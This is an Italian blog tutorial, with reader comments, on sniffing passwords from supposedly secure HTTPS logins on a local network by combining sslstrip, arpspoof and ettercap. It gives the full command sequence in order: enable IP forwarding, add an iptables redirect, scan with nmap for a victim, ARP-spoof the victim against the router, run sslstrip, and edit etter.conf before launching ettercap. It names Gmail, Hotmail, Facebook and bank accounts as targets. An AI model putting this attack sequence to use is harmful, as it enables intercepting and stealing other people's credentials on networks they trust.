domenica 10 gennaio 2010

Ssl-Strip con Ettercap

SslStrip assieme ad Ettercap permette di sniffare password durante l'accesso in siti con cifratura ssl, siti che dovrebbero essere sicuri ad un eventuale attacco, quindi se un malintenzionato entra nella vostra rete privata, dovuta ad una mancanza di protezione della vostra rete wireless, potrebbe venire in possesso dei vostri account email e password di hotmail, gmail, facebook e anche bancari. Illustrerò la configurazione di SsLStrip corredata di video dimostrativo pubblicato su youtube da Backtrack.it dove potete vedere altri stupendi video dimostrativi come quelli per Ettercap, questo è un tutorial dimostrativo non mi assumo nessuna responsabilità per un eventuale uso illegale.

Rileviamo la nostra interfaccia di rete wireless o ethernet

root@morfes:~# ifconfig wlan1

configuriamo gli iptables del nostro firewall

root@morfes:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@morfes:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

effettuiamo con nmap una scansione dei range degli ip della nostra rete partendo dall'ip del router, per poter trovare l'ip del nostro pc vittima

root@morfes:~# nmap 192.168.1.1-254

avviamo arpspoof
è mettiamo l'interfaccia di rete, l'ip vittima e l'ip del router

root@morfes:~# arpspoof -i wlan1 -t 192.168.1.101 192.168.1.1

avviamo sslstrip da un'altro terminale è digitiamo

root@morfes:~# sslstrip -a

sempre da shell avviamo ettercap
, ma prima dobbiamo modificare il file di configurazione di etter.conf in /etc/ ovviamente logati da root cosi:

# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

togliendo i #

# if you use ipchains:
redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

adesso avviamo ettercap e digitiamo

root@morfes:~# ettercap -T -q -i wlan1

da questo momento in poi quando entriamo nei nostri account email dal pc vittima, sniffiamo tutte le password! :)




8 commenti:

Davide Cumbo ha detto...

Da dove posso scaricare Ssl-Strip?

morfes ha detto...

Ciao Davide, se cerci su google trovi dove poter scaricare ssl-strip, per esempio in questo sito: http://www.thoughtcrime.org/software/sslstrip/. Oppure come dice il mio articolo puoi usare la distro backtrack che già contiene ssl-strip e molti altri tools.

Anonimo ha detto...

Ciao alcune guide non tolgono i commenti a ipchains mentre tolgono i commenti solo a iptables, che differenza passa ?

morfes ha detto...

Be non c'è differenza perchè fanno tutti e due la stessa cosa, infatti a partire dalla versione kernel 2.4 gli ipchains sono stati sostituiti con gli iptables, quindi uno deve decommentare gli ipchains se ha una vecchia versione del kernel, quindi se tu hai un kernel aggiornato puoi anche solo decommentare gli iptables

Anonimo ha detto...

morfes,ti ammiro per la tua pazienza nei confronti di questi ragazzi,e ammiro il lavoro che fai,continua cosi.

Snake.

morfes ha detto...

Grazie

Mario ha detto...

"da questo momento in poi quando entriamo nei nostri account email dal pc vittima, sniffiamo tutte le password! :) "

..in che senso?

skynet ha detto...

salve a tutti io ho un probl. non riesco in nessun modo ha visualizzare con ettercap le connessioni ssl ho seguito le varie guide, ho decommentato su etter.conf iptables ma niente...volevo procede per step utizzando in seguito ssl-strip,ma prima vorrei visualizzare il certificato falso:)
premetto uso un proxy potrebbe dipende da quello?,io nn credo le connessioni in chiaro le prendo,nn so piu cosa fare......helpmeee

Posta un commento